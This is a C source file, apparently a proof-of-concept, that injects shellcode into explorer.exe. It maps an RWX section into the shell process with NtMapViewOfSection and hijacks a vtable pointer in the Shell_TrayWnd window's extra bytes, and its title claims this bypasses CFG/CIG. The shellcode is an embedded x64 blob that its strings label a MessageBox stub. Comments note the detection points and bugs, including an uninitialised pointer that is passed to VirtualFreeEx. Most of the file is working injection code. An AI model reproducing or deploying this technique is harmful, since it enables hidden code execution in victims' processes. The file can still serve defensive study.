Injecting shellcode into explorer.exe with the ExtraBytes and NtMapViewOfSection technique, not affected by CFG/CIG
#include "stdafx.h" | |
#include <Windows.h> | |
// Opaque x64 payload bytes. The author labels it a MessageBox stub and the
// trailing bytes spell "Mapping Injection!" and "MessageBox"; the blob is
// treated as data only and is not decoded or reviewed here. Because it is
// declared from a string literal, sizeof(shellcode) (used for the section
// size and the copy length in extraBytes) also counts the implicit
// terminating NUL.
unsigned char shellcode[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
"\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
"\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
"\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
"\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88"
"\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48"
"\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e"
"\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41"
"\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24"
"\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e"
"\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1"
"\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e\x4c\x8d"
"\x85\x2d\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x4d\x61\x70\x70\x69"
"\x6e\x67\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x21\x00\x4d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
// Local mirror of ntdll's SECTION_INHERIT (not exposed by <Windows.h>).
// The numeric values are part of the native API contract; ViewUnmap is the
// InheritDisposition passed to NtMapViewOfSection in extraBytes().
typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;
// Signature of the undocumented ntdll export NtMapViewOfSection, which
// extraBytes() resolves at runtime with GetProcAddress. Parameter order and
// types follow the native ABI and must not be rearranged. Note that the
// call lets a section be mapped into *another* process (ProcessHandle), which
// is the cross-process step defenders typically monitor.
typedef NTSTATUS(WINAPI *TypeNtMapViewOfSection)(
    HANDLE SectionHandle,
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    SIZE_T CommitSize,
    PLARGE_INTEGER SectionOffset,
    PSIZE_T ViewSize,
    DWORD InheritDisposition,
    ULONG AllocationType,
    ULONG Win32Protect);
// Layout this PoC assumes for the object referenced from Shell_TrayWnd's
// window extra bytes: a vtable pointer followed by three slots. extraBytes()
// reads AddRef/Release/WndProc from the target as one contiguous
// 3 * sizeof(ULONG_PTR) block starting at &ct.AddRef, and later points
// vTable at the AddRef slot of a remote copy, so member order and the
// absence of padding between fields are load-bearing.
typedef struct _ctray_vtable {
    ULONG_PTR vTable;   // pointer to the vtable (first word of the object)
    ULONG_PTR AddRef;   // vtable slot 0 as read from the target
    ULONG_PTR Release;  // vtable slot 1 as read from the target
    ULONG_PTR WndProc;  // vtable slot 2; the slot this PoC overwrites
} CTray;
// Proof-of-concept "ExtraBytes" injection into the process that owns the
// taskbar window (Shell_TrayWnd). From a detection standpoint every step is
// observable: OpenProcess with PROCESS_ALL_ACCESS on the shell process,
// creation of a PAGE_EXECUTE_READWRITE pagefile-backed section, a
// cross-process NtMapViewOfSection, a remote VirtualAllocEx +
// WriteProcessMemory, and SetWindowLongPtr on a window the caller does not
// own. Code-review notes: no return value is checked (FindWindow,
// GetProcAddress, OpenProcess, both ReadProcessMemory calls, the mapping
// calls, WriteProcessMemory); `cs` is passed to VirtualFreeEx without ever
// being assigned (undefined behaviour); and the local mapping
// (lpMapAddress / hFileMap) is never unmapped or closed.
VOID extraBytes() {
    LPVOID cs, ds;      // NOTE: cs is never assigned anywhere in this function
    CTray ct;           // local copy of the target's object / vtable words
    ULONG_PTR ctp;      // original extra-bytes value (pointer in the target's address space)
    HWND hw;
    HANDLE hp;
    DWORD pid;
    SIZE_T wr;
    // NtMapViewOfSection has no public header; it is resolved by name at runtime.
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    TypeNtMapViewOfSection pNtMapViewOfSection = (TypeNtMapViewOfSection)GetProcAddress(ntdll, "NtMapViewOfSection");
    // Locate the taskbar window and its owning process. hw is NULL when the
    // shell is not running; that case is not handled here.
    hw = FindWindow(L"Shell_TrayWnd", NULL);
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    // Extra-bytes slot 0 holds a pointer (valid only in the target) to an
    // object whose first word is a vtable pointer. Read that vtable pointer,
    // then its first three entries into ct.AddRef / ct.Release / ct.WndProc.
    ctp = GetWindowLongPtr(hw, 0);
    ReadProcessMemory(hp, (LPVOID)ctp,(LPVOID)&ct.vTable, sizeof(ULONG_PTR), &wr);
    ReadProcessMemory(hp, (LPVOID)ct.vTable,(LPVOID)&ct.AddRef, sizeof(ULONG_PTR) * 3, &wr);
    // The payload is staged through an RWX section: mapped writable locally,
    // filled, then the same section is mapped executable into the target.
    // The requested base of 0 lets the target-side view land anywhere.
    HANDLE hFileMap = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL);
    LPVOID lpMapAddress = MapViewOfFile(hFileMap, FILE_MAP_WRITE, 0, 0, sizeof(shellcode));
    memcpy((PVOID)lpMapAddress, shellcode, sizeof(shellcode));
    LPVOID requested_target_payload = 0;
    SIZE_T view_size = 0;
    pNtMapViewOfSection(hFileMap, hp, &requested_target_payload, 0, sizeof(shellcode), NULL, &view_size, ViewUnmap, 0, PAGE_EXECUTE_READWRITE);
    // Build a replacement object in the target. Its vtable pointer is aimed
    // at the AddRef slot of this same remote copy, so the three consecutive
    // words [AddRef, Release, WndProc] act as the vtable, with the WndProc
    // entry redirected to the mapped payload.
    ds = VirtualAllocEx(hp, NULL, sizeof(ct),MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    ct.vTable = (ULONG_PTR)ds + sizeof(ULONG_PTR);
    ct.WndProc = (ULONG_PTR)requested_target_payload;
    WriteProcessMemory(hp, ds, &ct, sizeof(ct), &wr);
    // Swap the window's extra-bytes pointer to the replacement object, post a
    // message so the target dispatches through the patched slot, then restore
    // the original pointer.
    SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);
    PostMessage(hw, WM_CLOSE, 0, 0);
    SetWindowLongPtr(hw, 0, ctp);
    // BUG: cs is indeterminate at this point (never assigned above).
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}
// Entry point: run the proof-of-concept once and exit with status 0.
int main(void)
{
    extraBytes();
    return 0;
}